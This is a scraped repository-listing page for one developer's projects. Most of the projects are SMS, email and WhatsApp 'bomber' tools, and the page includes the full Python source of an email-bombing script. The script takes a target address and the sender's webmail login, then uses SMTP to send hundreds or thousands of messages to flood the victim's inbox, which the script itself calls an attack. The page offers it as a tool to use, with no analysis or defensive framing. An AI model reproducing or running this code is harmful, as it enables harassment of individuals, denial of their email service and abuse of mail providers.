Giter Club home page Giter Club logo

Anik Reza Akash's Projects

bombers icon bombers

SMS/Email/Whatsapp bombers Collection :bomb::bomb::bomb: :boom:

email-bombing icon email-bombing

Ce script python permet de bombarder une adresse e-mail des mails.

embomber icon embomber

Python Script for Email Bombing which supports Gmail, Yahoo, Hotmail/Outlook

mail-bombing.py icon mail-bombing.py

# But srsly, hit that sub button so you don't miss out on more content! '''imports''' import smtplib import sys class bcolors: GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' def banner(): print(bcolors.GREEN + '+[+[+[ Email-Bomber v1.0 ]+]+]+') print(bcolors.GREEN + '+[+[+[ made with codes ]+]+]+') print(bcolors.GREEN + ''' \|/ `--+--' | ,--'#`--. |#######| _.-'#######`-._ ,-'###############`-. ,'#####################`, .___ .__ . |#########################| [__ ._ _ [__) _ ._ _ |_ _ ._. |###########################| [___[ | )[__)(_)[ | )[_)(/,[ |#############################| |#############################| Author: w3w3w3 |#############################| |###########################| \#########################/ `.#####################,' `._###############_,' `--..#####..--' ,-.--. *.______________________________________________________________,' (Bomb) `--' ''') class Email_Bomber: count = 0 def __init__(self): try: print(bcolors.RED + '\n+[+[+[ Initializing program ]+]+]+') self.target = str(input(bcolors.GREEN + 'Enter target email <: ')) self.mode = int(input(bcolors.GREEN + 'Enter BOMB mode (1,2,3,4) || 1:(1000) 2:(500) 3:(250) 4:(custom) <: ')) if int(self.mode) > int(4) or int(self.mode) < int(1): print('ERROR: Invalid Option. GoodBye.') sys.exit(1) except Exception as e: print(f'ERROR: {e}') def bomb(self): try: print(bcolors.RED + '\n+[+[+[ Setting up bomb ]+]+]+') self.amount = None if self.mode == int(1): self.amount = int(1000) elif self.mode == int(2): self.amount = int(500) elif self.mode == int(3): self.amount = int(250) else: self.amount = int(input(bcolors.GREEN + 'Choose a CUSTOM amount <: ')) print(bcolors.RED + f'\n+[+[+[ You have selected BOMB mode: {self.mode} and {self.amount} emails ]+]+]+') except Exception as e: print(f'ERROR: {e}') def email(self): try: print(bcolors.RED + '\n+[+[+[ Setting up email ]+]+]+') self.server = str(input(bcolors.GREEN + 'Enter email server | or select premade options - 1:Gmail 2:Yahoo 3:Outlook <: ')) premade = ['1', '2', '3'] default_port = True if self.server not in premade: default_port = False self.port = int(input(bcolors.GREEN + 'Enter port number <: ')) if default_port == True: self.port = int(587) if self.server == '1': self.server = 'smtp.gmail.com' elif self.server == '2': self.server = 'smtp.mail.yahoo.com' elif self.server == '3': self.server = 'smtp-mail.outlook.com' self.fromAddr = str(input(bcolors.GREEN + 'Enter from address <: ')) self.fromPwd = str(input(bcolors.GREEN + 'Enter from password <: ')) self.subject = str(input(bcolors.GREEN + 'Enter subject <: ')) self.message = str(input(bcolors.GREEN + 'Enter message <: ')) self.msg = '''From: %s\nTo: %s\nSubject %s\n%s\n ''' % (self.fromAddr, self.target, self.subject, self.message) self.s = smtplib.SMTP(self.server, self.port) self.s.ehlo() self.s.starttls() self.s.ehlo() self.s.login(self.fromAddr, self.fromPwd) except Exception as e: print(f'ERROR: {e}') def send(self): try: self.s.sendmail(self.fromAddr, self.target, self.msg) self.count +=1 print(bcolors.YELLOW + f'BOMB: {self.count}') except Exception as e: print(f'ERROR: {e}') def attack(self): print(bcolors.RED + '\n+[+[+[ Attacking... ]+]+]+') for email in range(self.amount+1): self.send() self.s.close() print(bcolors.RED + '\n+[+[+[ Attack finished ]+]+]+') sys.exit(0) if __name__=='__main__': banner() bomb = Email_Bomber() bomb.bomb() bomb.email() bomb.attack()

pybomb icon pybomb

Easy an Mail Bomber programmed with Python language.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.